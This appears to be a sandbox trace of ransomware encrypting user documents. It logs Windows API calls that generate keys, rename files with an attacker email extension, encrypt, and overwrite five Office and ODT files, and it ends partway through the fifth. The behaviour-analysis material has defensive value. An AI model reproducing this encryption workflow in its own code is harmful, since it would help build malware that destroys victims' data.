	[0099.840] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.840] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_ndlV.pptx", dwFileAttributes=0x80) returned 1
	[0099.840] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_ndlV.pptx") returned 51
	[0099.841] GetProcessHeap () returned 0x540000
	[0099.841] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xcc) returned 0x59d258
	[0099.841] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_ndlV.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_ndlV.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_ndlV.pptx"
	[0099.841] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_ndlV.pptx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_ndlV.pptx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_ndlV.pptx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.841] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_ndlV.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_ndlv.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_ndlV.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_ndlv.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.846] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_ndlV.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_ndlv.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.846] GetProcessHeap () returned 0x540000
	[0099.846] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0099.846] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=23970) returned 1
	[0099.846] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x5da2
	[0099.846] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.846] GetProcessHeap () returned 0x540000
	[0099.846] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.846] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.846] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.847] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.847] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.847] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x5da2) returned 0x601bb8
	[0099.847] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x5da2) returned 0x607968
	[0099.847] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.847] ReadFile (in: hFile=0x380, lpBuffer=0x601bb8, nNumberOfBytesToRead=0x5da2, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesRead=0x3a1f778*=0x5da2, lpOverlapped=0x0) returned 1
	[0099.847] SetFilePointer (in: hFile=0x380, lDistanceToMove=-23970, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.847] WriteFile (in: hFile=0x380, lpBuffer=0x607968*, nNumberOfBytesToWrite=0x5da2, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x607968*, lpNumberOfBytesWritten=0x3a1f778*=0x5da2, lpOverlapped=0x0) returned 1
	[0099.849] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.849] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.849] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zWhcyCuu7COGA9mp.doc", dwFileAttributes=0x80) returned 1
	[0099.849] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zWhcyCuu7COGA9mp.doc") returned 61
	[0099.849] GetProcessHeap () returned 0x540000
	[0099.849] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe0) returned 0x598b60
	[0099.849] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zWhcyCuu7COGA9mp.doc" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zWhcyCuu7COGA9mp.doc") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zWhcyCuu7COGA9mp.doc"
	[0099.849] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zWhcyCuu7COGA9mp.doc", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zWhcyCuu7COGA9mp.doc.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zWhcyCuu7COGA9mp.doc.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.850] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zWhcyCuu7COGA9mp.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zwhcycuu7coga9mp.doc"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zWhcyCuu7COGA9mp.doc.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zwhcycuu7coga9mp.doc.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.851] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zWhcyCuu7COGA9mp.doc.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zwhcycuu7coga9mp.doc.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.851] GetProcessHeap () returned 0x540000
	[0099.851] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.851] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=5244) returned 1
	[0099.851] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x147c
	[0099.851] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.852] GetProcessHeap () returned 0x540000
	[0099.852] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.852] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.852] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.853] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.853] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.853] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x147c) returned 0x601bb8
	[0099.853] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x147c) returned 0x603040
	[0099.853] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.853] ReadFile (in: hFile=0x380, lpBuffer=0x601bb8, nNumberOfBytesToRead=0x147c, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesRead=0x3a1f778*=0x147c, lpOverlapped=0x0) returned 1
	[0099.853] SetFilePointer (in: hFile=0x380, lDistanceToMove=-5244, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.853] WriteFile (in: hFile=0x380, lpBuffer=0x603040*, nNumberOfBytesToWrite=0x147c, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x603040*, lpNumberOfBytesWritten=0x3a1f778*=0x147c, lpOverlapped=0x0) returned 1
	[0099.853] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.853] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.853] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YFnu6EVJ6.odt", dwFileAttributes=0x80) returned 1
	[0099.854] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YFnu6EVJ6.odt") returned 54
	[0099.854] GetProcessHeap () returned 0x540000
	[0099.854] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd2) returned 0x598b60
	[0099.854] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YFnu6EVJ6.odt" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YFnu6EVJ6.odt") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YFnu6EVJ6.odt"
	[0099.854] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YFnu6EVJ6.odt", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YFnu6EVJ6.odt.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YFnu6EVJ6.odt.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.854] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YFnu6EVJ6.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yfnu6evj6.odt"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YFnu6EVJ6.odt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yfnu6evj6.odt.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.856] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YFnu6EVJ6.odt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yfnu6evj6.odt.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.856] GetProcessHeap () returned 0x540000
	[0099.856] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.856] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=54396) returned 1
	[0099.856] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xd47c
	[0099.856] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.856] GetProcessHeap () returned 0x540000
	[0099.856] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.856] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.856] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.857] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.857] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.857] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd47c) returned 0x601bb8
	[0099.857] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd47c) returned 0x60f040
	[0099.857] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.857] ReadFile (in: hFile=0x380, lpBuffer=0x601bb8, nNumberOfBytesToRead=0xd47c, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesRead=0x3a1f778*=0xd47c, lpOverlapped=0x0) returned 1
	[0099.859] SetFilePointer (in: hFile=0x380, lDistanceToMove=-54396, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.859] WriteFile (in: hFile=0x380, lpBuffer=0x60f040*, nNumberOfBytesToWrite=0xd47c, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x60f040*, lpNumberOfBytesWritten=0x3a1f778*=0xd47c, lpOverlapped=0x0) returned 1
	[0099.859] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.859] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.859] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WgfXCH WWelulA.xls", dwFileAttributes=0x80) returned 1
	[0099.859] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WgfXCH WWelulA.xls") returned 59
	[0099.859] GetProcessHeap () returned 0x540000
	[0099.859] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xdc) returned 0x598b60
	[0099.859] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WgfXCH WWelulA.xls" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WgfXCH WWelulA.xls") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WgfXCH WWelulA.xls"
	[0099.859] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WgfXCH WWelulA.xls", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WgfXCH WWelulA.xls.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WgfXCH WWelulA.xls.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.859] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WgfXCH WWelulA.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wgfxch wwelula.xls"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WgfXCH WWelulA.xls.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wgfxch wwelula.xls.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.862] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WgfXCH WWelulA.xls.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wgfxch wwelula.xls.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.862] GetProcessHeap () returned 0x540000
	[0099.862] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.862] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=70608) returned 1
	[0099.862] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x113d0
	[0099.862] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.862] GetProcessHeap () returned 0x540000
	[0099.862] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.862] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.862] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.863] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.863] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.863] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x113d0) returned 0x601bb8
	[0099.863] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x113d0) returned 0x3790048
	[0099.864] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.864] ReadFile (in: hFile=0x380, lpBuffer=0x601bb8, nNumberOfBytesToRead=0x113d0, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bb8*, lpNumberOfBytesRead=0x3a1f778*=0x113d0, lpOverlapped=0x0) returned 1
	[0099.865] SetFilePointer (in: hFile=0x380, lDistanceToMove=-70608, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.865] WriteFile (in: hFile=0x380, lpBuffer=0x3790048*, nNumberOfBytesToWrite=0x113d0, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790048*, lpNumberOfBytesWritten=0x3a1f778*=0x113d0, lpOverlapped=0x0) returned 1
	[0099.866] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.866] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.866] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wAycIgHJXmJyatL6r.xlsx", dwFileAttributes=0x80) returned 1
	[0099.866] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wAycIgHJXmJyatL6r.xlsx") returned 63
	[0099.866] GetProcessHeap () returned 0x540000
	[0099.866] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe4) returned 0x598b60
	[0099.866] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wAycIgHJXmJyatL6r.xlsx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wAycIgHJXmJyatL6r.xlsx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wAycIgHJXmJyatL6r.xlsx"
	[0099.866] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wAycIgHJXmJyatL6r.xlsx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wAycIgHJXmJyatL6r.xlsx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wAycIgHJXmJyatL6r.xlsx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.866] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wAycIgHJXmJyatL6r.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\waycighjxmjyatl6r.xlsx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wAycIgHJXmJyatL6r.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\waycighjxmjyatl6r.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.868] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wAycIgHJXmJyatL6r.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\waycighjxmjyatl6r.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0099.868] GetProcessHeap () returned 0x540000
	[0099.869] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.869] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=33604) returned 1
	[0099.869] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x8344
	[0099.869] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.869] GetProcessHeap () returned 0x540000
	[0099.869] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.869] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.869] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.870] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.870] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.870] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8344) returned 0x601bb8
	[0099.870] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8344) returned 0x609f08
	[0099.870] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
